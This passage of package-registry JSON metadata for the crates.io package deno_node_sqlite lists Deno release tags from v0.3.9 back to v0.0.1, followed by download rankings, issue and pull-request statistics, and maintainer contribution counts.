o/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T07:07:47.997Z","dependent_packages_count":0,"downloads":45517,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":57.18683511488788,"dependent_repos_count":10.913176397351332,"dependent_packages_count":14.7970648053792,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":27.632358772539472},"purl":"pkg:cargo/deno_node_sqlite","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_node_sqlite","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_node_sqlite","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_node_sqlite/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/p